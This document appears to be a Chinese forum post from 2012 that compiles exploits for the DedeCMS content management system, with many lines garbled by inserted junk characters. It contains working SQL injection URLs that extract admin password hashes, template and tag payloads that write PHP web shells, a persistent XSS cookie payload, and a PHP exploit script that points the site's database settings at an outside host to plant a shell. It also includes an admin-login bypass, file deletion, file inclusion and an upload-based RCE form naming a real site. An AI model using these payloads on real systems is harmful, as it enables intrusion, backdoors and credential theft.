dedecms漏洞总结

admin · 发表于 2012-10-18 10:42:14

Dedecms 5.6 rss注入漏洞
9 V- F0 d  ?+ G5 R3 X& yhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
$ z! {$ Y  v# h3 \- T7 R! G
9 o+ g' r5 I1 V' B$ q9 T4 q' d; y  o. k( N4 h) q8 M

$ {- p  X; h! W: s& }/ l- D$ e, [& S7 x
( Z# ?5 Y( r* X6 L. j( g
6 R8 i2 H6 i% m- s3 x; @2 p" b- n" U
0 O- }4 K9 p- C) a7 s2 I  M9 B% p) {
/ t# z+ h2 m3 {8 k9 E
DedeCms v5.6 嵌入恶意代码执行漏洞
3 @5 v! c, |  ?) ]# m! Q+ N注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
- @9 A7 d3 c# T4 U( @( i5 g, `' T发表后查看或修改即可执行, k3 q( ~) f( }" j) X1 ^
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}! _: }0 T  H* X! f
生成x.php 密码xiao，直接生成一句话。
: g  o( N. J1 {4 ]- g: Z8 {8 q2 ^
  M. w" j- k* J) u" @; G4 `$ ~! G  }9 u

4 l; i9 q+ J2 h4 m' ^
8 h6 i7 X4 ^6 `) X
- q$ {' v# e. Y( |8 s
0 E  Z' X$ F& P3 [2 v
6 E/ ]- ~( D2 c- a( |/ K) E; C) c
: x1 k$ Z3 f) Y3 J6 YDede 5.6 GBK SQL注入漏洞
# i% Q2 @9 @4 \8 |http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';) U8 I" L/ K3 }7 H; C8 }" [
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
& q5 C: `8 {& uhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
* ?  l) Q7 J7 p
$ m. p& P; X5 l
( e7 x2 S: N! T5 O, c. y3 ^" {3 e
+ H  y/ ?/ a0 g
2 t  z! r5 z& A1 r, j& o) c
/ k+ t1 `6 f+ z) o5 T4 F% K' ^, y+ b  U1 t8 g! U
DEDECMS 全版本 gotopage变量XSS漏洞
; t6 o, N0 Y3 \/ }- L+ K- V1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。
3 q; G7 o& ~& H0 \  k/ ^http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="! Z5 x5 S7 l9 {: P: n  x; \
6 |' M) I6 X1 Q, X2 T. }
( A  S8 f' l+ [6 m% k
2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。
, `1 x+ z, \$ g  q# h; K4 B  k+ }http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

color=Red]DeDeCMS(织梦)变量覆盖getshell' t8 E/ r9 O! z6 s
#!usr/bin/php -w
4 ]8 c) b. F4 v4 W/ s. D<?php7 ]3 |5 c/ k# L6 l
error_reporting(E_ERROR);; Z7 H' [) e( N3 F
set_time_limit(0);
$ D- @/ r% K3 bprint_r('$ }! @' F, O; S# x4 b8 I! r
DEDEcms Variable Coverage
4 ]* o$ M$ w" I) YExploit Author: www.heixiaozi.comwww.webvul.com
);
7 e5 d) R3 w$ n; e8 V  [0 @' mecho "\r\n";
  _8 G* k9 ?* z" @( Yif($argv[2]==null){4 I: m- I8 M& R6 J$ h
print_r('% S1 E. l+ V0 i- P  y0 X1 j7 E( Q
+---------------------------------------------------------------------------+5 U! m: j% k9 ^4 c1 v* C2 z7 z
Usage: php '.$argv[0].' url aid path
+ q! x2 }, J/ G1 d% }( i+ k7 Taid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
1 V. d8 ^4 V; L6 f% FExample:' E% j4 i; p; L9 J# w! ?
php '.$argv[0].' www.site.com 1 old7 W- d( W( }" y& ]* Y; J  Z
+---------------------------------------------------------------------------+
7 C% `" E0 }" Z4 n');. O; n7 E! z: z( }* ^
exit;
) U  s1 K) Q$ N# V2 l$ C2 p$ {) l7 o}
' `/ }; l5 _: Z4 e) h# E$url=$argv[1];7 }$ R* m0 a: N! X4 g1 Y. i0 t# _
$aid=$argv[2];6 l5 {4 F3 b2 B3 k" B% g
$path=$argv[3];- g1 i5 G2 m& F9 C$ c; a
$exp=Getshell($url,$aid,$path);" h( d  e/ P" h/ h' u( j- N+ P
if (strpos($exp,"OK")>12){0 N2 k* O: P6 R% F; V
echo "" L3 e0 h4 K2 q, Q% G1 w
Exploit Success \n";
2 F+ P0 C9 U+ D% Mif($aid==1)echo "; x' _( R' I% J7 ]# s" L
Shell:".$url."/$path/data/cache/fuck.php\n" ;
. v8 [/ J) B1 w: a4 }9 H! a. U: |  w% b8 }1 ?. \; n! X

2 L7 K& w% k- n- m- Y9 ?, [' F% v# ~# Yif($aid==2)echo "/ }. Y& j2 \3 X  O
Shell:".$url."/$path/fuck.php\n" ;
# L7 x! Q7 a" {5 N; O1 d9 J; j
8 V+ R' v7 s1 A) ]* B! D1 R1 R1 q4 w; U
if($aid==3)echo "
1 }8 U9 J8 Y6 s2 j1 f# }Shell:".$url."/$path/plus/fuck.php\n";
: }# L+ p; t8 e" u% d: }4 _2 C0 d, H! ?$ P' O2 y/ c9 ~8 H: I" `
0 X) ?: Z$ V6 K4 z" I6 ~$ a; J( |
}else{
# W* v8 @" |1 H, |2 wecho "
6 W. L/ j! U2 o& W% sExploit Failed \n";7 j( p3 N' U, z( G" B
}% _0 c0 V2 O7 V
function Getshell($url,$aid,$path){& v5 x$ d' a/ I7 l) w
$id=$aid;- w5 Q% \/ d4 v
$host=$url;$ i' o  x, Z: R7 B
$port="80";
! H& x! {2 j( U: [: w$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";2 U- u/ ]* U, L9 [( |
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";' U6 R+ b( m* [; e$ S$ S
$data .= "Host: ".$host."\r\n";1 o& @& V; Z3 N! X. L! }0 f6 T
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";: U7 ^, X4 I/ N2 k
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
5 _2 _3 F0 i9 H! R. t! F$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";  p  C) @: `- S8 B6 N, i
//$data .= "Accept-Encoding: gzip,deflate\r\n";
& j, z6 V7 c' F7 v$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
! m, t. {6 u7 B7 W: `5 F3 T1 i$data .= "Connection: keep-alive\r\n";+ ^; S' V4 n. R  l! u/ }& {
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
- W2 \, u. ?6 W6 y$data .= "Content-Length: ".strlen($content)."\r\n\r\n";0 @# C2 ]* l* \1 |$ `% v# l( U
$data .= $content."\r\n";
& l9 ?  r( P0 u3 ^$ock=fsockopen($host,$port);
+ J) f% [9 {4 l3 q1 aif (!$ock) {
0 h  S$ j# O4 x7 c7 _echo "
$ G7 g8 o8 @- \/ K: z; C9 Y" y/ MNo response from ".$host."\n";& _# i- A" F* d4 m  ~7 \+ ]+ g# H
}, [4 |% G# t/ H! X4 y
fwrite($ock,$data);3 P3 Y8 i4 }0 o3 P
while (!feof($ock)) {- p; b/ p$ T5 C1 X+ l
$exp=fgets($ock, 1024);
8 m, e: z# b. @9 F* `% Vreturn $exp;
5 S  R$ ~1 ~  Z$ S) |}
3 p+ ], u% J1 m}7 B2 g) U( u  g+ G4 N7 k: }5 p' Y3 F
4 S, W5 C9 R5 I: u+ |

3 i: u; L  S" Z  M9 b6 Y' S' i) y?>
* A5 w7 v: I/ b# E
8 A5 p& w* _5 C' g( ~- j
5 c" Z6 ^+ k  C  c; b0 c$ H7 r0 N& @5 j" D
" S/ F& u- ]3 F% r) r

: E# ?- \- a+ d4 m* f
, t0 ^6 j( C5 x$ l# M" I# @6 V8 H  H
1 M, k- G% t& X8 [9 i6 H/ |0 {2 s2 _0 H8 }. f  f7 b% ~; I# a
+ w6 D, p% k3 B- h8 b/ g
$ I) S& R' j, L, L
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
: e; d" q4 R9 T# ^5 y$ i8 ahttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root; _, r2 |, W' g& {* Y6 |' c5 a, j
' G4 @4 d4 s0 \" L6 R( G" L& ~
  T9 v: f$ }# @& c6 @  u
把上面validate=dcug改为当前的验证码，即可直接进入网站后台
) F0 i) O- I, j+ M/ `' `3 s! z
2 k( E+ F* A  J( s4 P  B) t& L
7 Z. P% I& |# V4 `此漏洞的前提是必须得到后台路径才能实现- v. Q. D6 F  U2 L: P

: G6 t! u4 \* u1 S( o3 g% x8 K5 f5 k, ^4 Q
6 h. C# {; I+ `7 z3 O: \4 {' [

" K9 w  w9 D( k- \
4 S( T' o3 {* d6 \1 {% T( T. c* s" \  ?! L3 M

5 O  |$ H3 I6 O$ N4 Q
3 U  c  K1 e0 ]; `$ A
' y; r8 Y6 H# B
3 w- S: n& S" ODedecms织梦标签远程文件写入漏洞
( L  E' s, o% o# d- a& X前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');& W2 a+ i' O3 j! e8 ~9 c

$ x$ J7 k) ]; n, A  h
/ f% D' U- P0 H, c- `再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。
6 g, v- V* Q% ~; r$ i& m# l  o<form action="" method="post" name="QuickSearch" id="QuickSearch">  F* k, ?/ K# E' k+ X$ A
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
$ d0 |2 z5 @, N7 ^& W1 z<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
+ e3 Y5 d$ c8 [<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />5 t! J/ e/ b; H( n
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />, Q% y- X6 s4 a' y  O6 l0 ^0 ^& @
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />! l/ y1 z8 O  T: V4 k
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
9 Z2 J. L! v1 }2 w+ L# r# G& N; y<input type="text" value="true" name="nocache" style="width:400">
0 X9 B  l& S+ x% ?( `: O<input type="submit" value="提交" name="QuickSearchBtn"><br />
# R- Z' N# N  q% ?5 m8 U' V' e</form>
( V+ M5 S% z2 q6 F<script>
, P  w6 s! I  F5 _function addaction()
$ A: p. B& |9 U/ {{
4 q% Y& x1 t8 z2 I) r9 p- Tdocument.QuickSearch.action=document.QuickSearch.doaction.value;
$ @: [  c# m7 S. j" c/ z}
0 W. T4 R! m* D+ z+ v" d* `' ~</script>
- w6 T2 I/ r1 `6 R. N
/ `  n. n# m; w' ]$ E8 X/ z: k) {" g! C/ r

) G0 z6 n$ f! x5 M  w5 G6 B$ @% W. v) N0 F) ^" @
) M% f9 K" F6 D( J3 @7 ?

$ f: i+ W9 ^- d. e  o
+ k* g! a; J" I- W5 m& B( w3 z. q) p$ e1 h) o0 N
4 G( ]; ~4 S/ I) d

4 k' Y2 A8 l; x  v( qDedeCms v5.6 嵌入恶意代码执行漏洞
. h# P# k& c$ H0 W注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行* t! I& l: j7 p6 E1 X& q
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
' l0 @! A+ U* \) @, ]5 E) E生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得
! j7 R* I- k* N( e" F/ KDedecms <= V5.6 Final模板执行漏洞" p9 n. T' u5 ]# p! o; a
注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：) ^. {7 E5 m0 B8 S4 \
uploads/userup/2/12OMX04-15A.jpg5 A6 e, A% [3 t; {4 I. F

" U- D9 B+ C2 q0 X9 C; w% d- u! o
: E- R/ Q$ B! u3 H6 G+ h模板内容是（如果限制图片格式，加gif89a）：' P; ?: O0 F- q" ?5 C" i
{dede:name runphp='yes'}
. t" F/ U& X9 ?4 z0 V/ B9 a$fp = @fopen("1.php", 'a');
! F: W$ o$ k$ L5 l! I@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");0 F  Q. I  V/ }
@fclose($fp);
+ q% a7 y9 C' S; g) b& b7 \+ {{/dede:name}& \/ d/ S4 R  w, r! g* u4 ?% r
2 修改刚刚发表的文章，查看源文件，构造一个表单：8 r9 a- o/ i6 p) j3 P
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">% k' `0 U9 }9 k' i
<input type="hidden" name="dopost" value="save" />
: I9 r' u; G6 ]  `8 q1 S" u<input type="hidden" name="aid" value="2" />
) j0 z+ L7 k0 A! K- B<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
1 B7 p" ^2 t, w3 L7 k$ b2 r$ W5 a<input type="hidden" name="channelid" value="1" />
: [: ~2 V! H7 j4 l( k& Y<input type="hidden" name="oldlitpic" value="" />
+ @' ^% L% M5 M$ i% l4 _) e! U" l0 J<input type="hidden" name="sortrank" value="1275972263" />
0 @7 M( X/ C" D
+ q+ @7 E% C& x  P5 U- T- O
0 V7 Z' b3 _" G0 q) }7 c0 M7 U' _: H3 A<div id="mainCp">1 p; N. l2 J$ @; e
<h3 class="meTitle"><strong>修改文章</strong></h3>
: D# c5 R$ r/ _! @( f& I
7 A! E6 J2 f" c1 U
$ ^8 L: ^; ], m- C; x  A# q<div class="postForm">8 n, o, k! K. E# X
<label>标题：</label>
4 m! A. C- I" T/ a<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
1 ^! \. Z5 e) F% B
4 y7 W% z5 P' {( b' a8 x
* E" t, n: \/ y2 T: e<label>标签TAG：</label>/ t, ^" n2 x# M7 T! X$ |
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开): A$ M8 A5 [4 L2 ~% ?! N: e) x

% K8 v; Y0 K: _$ H/ }6 }0 y6 U* u& |
<label>作者：</label>2 a4 Z7 M/ A& ]  A" p
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
( d, z: N2 g- |
& L" T+ d4 J5 t4 E8 \5 K- M6 R  A* h
<label>隶属栏目：</label>0 L2 {; m( c, I4 C1 X
<select name='typeid' size='1'>; n+ I  o6 J+ T  ~5 o' q- c
<option value='1' class='option3' selected=''>测试栏目</option>7 R4 T) y) Z3 S6 Y7 ?
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)3 l+ `* N! y7 _: B8 T

; ]8 l. k! R' s1 m2 Z7 j
3 U1 F( u8 g4 B5 ~+ U+ \<label>我的分类：</label>
9 x) q. I4 t, v; i<select name='mtypesid' size='1'>4 @+ R, R( z* s' D6 J
<option value='0' selected>请选择分类...</option>
9 h. x# \" d* [7 |4 {: C<option value='1' class='option3' selected>hahahha</option>
# ?9 r# O+ [7 h+ L" w! f</select>+ D" a# i! _$ e: P, |
, ?3 ?. U; a  @* E' C9 ~; k% ?

) v  q$ R# A1 [<label>信息摘要：</label>
# R/ q* I& o: X! ?  i& z9 O! i<textarea name="description" id="description">1111111</textarea>* D4 \+ w3 ?% z
(内容的简要说明)' o/ k5 e+ Y3 f. r

# R" I# p- i8 U2 B2 u/ ~
! m* x7 H# H9 L<label>缩略图：</label>
3 T8 [- i) c( c, N1 f<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
1 i: h( T# v* Q6 Q& X2 ~( U9 ^1 o1 _0 h$ \

  [5 g; G7 p: |9 B$ n<input type='text' name='templet') j0 Q3 ]/ w4 ^$ _1 B% ?
value="../ uploads/userup/2/12OMX04-15A.jpg">" L3 ]+ Y8 [8 h  U
<input type='text' name='dede_addonfields'
% N# Q- M" @" g% @2 Y7 Hvalue="templet,htmltext;">（这里构造）1 V( Y. d9 f: N. R) [* d
</div>8 R. g. d. `3 B8 q8 h8 X

+ p' w8 |; G4 q9 w
0 M% b1 B4 T$ [1 R8 {1 n9 I  k( W+ Z/ l1 f: N% E! x4 D. {2 @
<h3 class="meTitle">详细内容</h3>
* e) l5 n3 k4 ^
2 U. `2 ]0 w1 n$ p% i3 j' i0 w' {8 F" H6 Z' u+ i' G4 K
<div class="contentShow postForm">! \+ N. u. V9 W( t0 t, s3 {+ m7 t
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>7 F' q( d0 [1 M# l
0 b' u3 _8 |5 q1 a

* b0 ]+ L3 n9 T$ e<label>验证码：</label>& J7 F* D: O/ R6 B2 S
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
2 {& {/ b% N) t# {# l3 X<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />; v& L& q  z" g/ R. m0 P

& L; P1 h# Y/ e, \7 S, o* Z$ b) f8 `% \" M! @4 X2 A; o* L# J/ B9 t5 k
<button class="button2" type="submit">提交</button>6 h! d3 q; m$ U* t- z; Y) f
<button class="button2 ml10" type="reset">重置</button>
, ^3 X) T0 T, m7 G3 F& [</div>
- S! U9 k9 [" @. a' m6 N; R: X# U* u! |. H8 I/ E

/ M9 O+ e% [! S. `/ a3 [# h</div>
- k8 P2 a& {" x: U' t
0 |" |& i" Z' j1 S" G# l
, a4 ]8 y2 x1 p' t: y</form>( w) X/ F  \- N1 c' T

) D' P: J# S& C1 t: d; i
6 d/ }" P5 Z5 e8 d+ b: p提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：
$ n/ I% e8 A# `) S! M假设刚刚修改的文章的aid为2，则我们只需要访问：# w8 g+ i5 |4 V' O, F( L* C' G
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell：1.php) g% E- r& }, A8 V% Z

+ |4 G; m  k: ~. B  W  }3 \- g& k5 }: W! f1 Q

9 U6 P; T1 W2 N4 c: ?7 }- r1 d. I: k. u5 G
! y+ H8 a5 U, [

* Z* `- F( u7 k; [' C9 N8 K% ], i$ t) ?1 p" h+ n0 R  X
/ s+ ~, z0 W1 U% I0 N: \

7 K$ Z8 o0 @1 e( y( I: Z; B
. N& z4 n) V- o* ~' f5 G
/ v% A9 R3 j; O/ X
1 k! K" h9 z, X1 O) @7 hDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)2 t& S1 w& k( L
Gif89a{dede:field name='toby57' runphp='yes'}
6 R; r) U3 C2 j4 G: z. Hphpinfo();) `' @3 f5 o& l/ g( N
{/dede:field}* d8 K4 a9 P) o0 |( \
保存为1.gif/ T6 T3 q1 J) Z
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 9 d9 i$ [# e1 m. f9 K1 w
<input type="hidden" name="aid" value="7" /> % i4 \) i* g! p9 \
<input type="hidden" name="mediatype" value="1" /> % w  p  v' D& P6 ~
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
8 V! |& d4 u& d2 I$ ^' G4 r<input type="hidden" name="dopost" value="save" /> ' ~) m) K/ R3 T+ R8 ^. Y# i) R
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> 6 y: i. b1 _8 _% ^! I
<input name="addonfile" type="file" id="addonfile"/>
$ h2 P7 I% W7 t# n( ?4 a1 ^<button class="button2" type="submit" >更改</button> ( p" }2 r$ J. R9 i4 ~
</form> 0 h0 }0 g5 h5 C- z4 `; X/ B' c

5 L4 e! u3 a! r/ z9 S. K
3 V4 T6 K! y& q/ W0 K: h$ {! _* W# [构造如上表单，上传后图片保存为/uploads/userup/3/1.gif& y$ {6 X- W5 a4 ]$ P3 g
发表文章，然后构造修改表单如下：
) i7 A% b8 h* N( H) t
/ S9 l, n, l  \1 J4 E7 A. j/ r( T) v3 l1 y$ J; g8 [: {7 G7 d
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> ( V  u( l8 D2 ~7 g1 G
<input type="hidden" name="dopost" value="save" />
$ v7 h( ?" z, p; G* o5 B<input type="hidden" name="aid" value="2" /> 8 l' _1 u1 B3 v5 B; k
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
  v( Q5 V# `6 e8 w6 w& d<input type="hidden" name="channelid" value="1" /> . }1 k: n) {: C5 x/ C5 b
<input type="hidden" name="oldlitpic" value="" /> ) z& x% i8 K4 M% n; g. D
<input type="hidden" name="sortrank" value="1282049150" />
9 Q! F4 e! y3 y4 S0 M<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
! [+ [& {, q8 o$ s. P<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> 3 V. ^5 y2 `  g
<select name='typeid' size='1'>
$ T7 `; k1 w* M/ B; |<option value='1' class='option3' selected=''>Test</option>
0 n4 a* ~* K0 ^. r4 M* a5 d<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option> ) l% J+ j; P2 u5 N$ D: e
<option value='1' class='option3' selected>aa</option></select> ; a3 t  B; y$ O- f
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 3 U+ ^2 ~* y6 e9 f3 m2 K2 t% E! ?
<input type='hidden' name='dede_addonfields' value="templet">
; @& {$ h* G6 ]) L+ Y6 V. B<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> 0 n- p. V+ E+ _8 k
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> ( \6 e9 d2 r; Q
<button class="button2" type="submit">提交</button>
4 Z. [: Y3 Y  X( I</form>. T, @! _6 m9 V7 j5 J. W# G$ s) {

3 P: q/ h4 {  I0 x9 `
/ D8 Q- |; p- E" G% d
6 u' H9 M. x4 W) ^# c
+ y4 }  T1 N0 P
0 }- x0 O' G+ w. B2 y
1 z' C5 s* u% M  }1 H! s) g) U) G5 i+ m8 b# w

: @. [# c& x7 A1 @9 u2 P0 t* y
: t! d2 v" _9 d# {7 c& O+ D4 R7 U! F# s6 V: }$ q* L

, w* x8 M- `8 ~4 {' X9 r8 |
9 Y2 E" _) s  ^. {5 x1 E织梦(Dedecms)V5.6 远程文件删除漏洞
; ?% W" h  e2 S7 Ohttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
' s, Q! R" P- \: w# y3 h! h4 ^; a0 ^http://www.test.com/plus/carbuya ... urn&code=../../8 k* J, ?( n6 X  v! \% ]; i" y
+ ~# D3 z0 V( Q; H# {

! g5 e& ?1 S' h1 v; Y! Z
9 V/ u* G  @# C% V
0 x' C! }* Q! _2 i9 B& L. Q, r% ?
5 P1 y/ [- o1 P! h1 E% `2 D3 S7 F( e6 f! s# I/ s

4 y$ ~: u3 h( G- w7 \% t6 i
6 b# D& M: S' r% ]) d; [
; @6 B7 p) l  v9 R  f' a
; L- Z: ~: P  `; FDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
% c& D  Z, K  j! e3 Lplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
4 E+ C! ?' _- x2 p) D密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5
9 p9 o& g$ i9 N0 {0 c* A! y) f3 \" V

) x5 r% F1 j, y. j4 m- V5 l  `, w+ b# n/ ]0 s" F1 h" i; a- H3 f4 b, U

  z* G$ l7 n% |. J9 c( P- F
9 |2 U* o0 p/ x' t. N2 y, K; r$ Q

% }* B1 E8 t  |) v, c) h4 N* A( y7 a& U
. p. ]+ O$ R, W( T5 f+ t( X7 H
' ]$ }2 I* n  E. r8 \3 Z
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞7 q3 d4 Y( ^/ g8 _) ?
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='4 J  L( o1 z( v% e( q

4 ]% D( h9 x) O* E3 ]( D3 L
% @! B7 J5 y  t: z# l9 {6 ^* o$ D5 k9 H
0 Q# l: q/ g: t/ P+ F

7 B4 t) _2 f3 E9 S7 ~% n3 x' a0 X! C- H$ c& T/ t/ F6 }
+ k! S6 w$ ^% X' n

- q: P# ?7 O0 I; P
# D4 @1 u- V/ g6 z6 h! q- {8 C  ^: ?
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
) l+ X0 l' {0 g<html>
$ Z) Z2 x6 R: N* h- s<head>8 G+ c; ~5 x2 K/ _4 d8 ~9 ^
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
' A- B8 t! ?: o5 r</head>- L; j7 J9 f. [3 k( [0 o
<body style="FONT-SIZE: 9pt">
) F" O4 F" V) W---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
8 n; Q8 o0 r% C# Q' G4 \<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
  _7 T: U8 o* R4 `* c3 Q<input type='hidden' name='activepath' value='/data/cache/' />
; C) J, _4 f8 u% [/ Q<input type='hidden' name='cfg_basedir' value='../../' />
& m: H- i( t% L: r4 @/ `<input type='hidden' name='cfg_imgtype' value='php' />
8 r( b. P2 h7 S4 c' X, ~/ p<input type='hidden' name='cfg_not_allowall' value='txt' />) F1 g1 z* {" g- M7 V
<input type='hidden' name='cfg_softtype' value='php' />
# T' N* v9 O2 V/ L) {1 C<input type='hidden' name='cfg_mediatype' value='php' />& S2 g. n6 P) d/ i
<input type='hidden' name='f' value='form1.enclosure' />
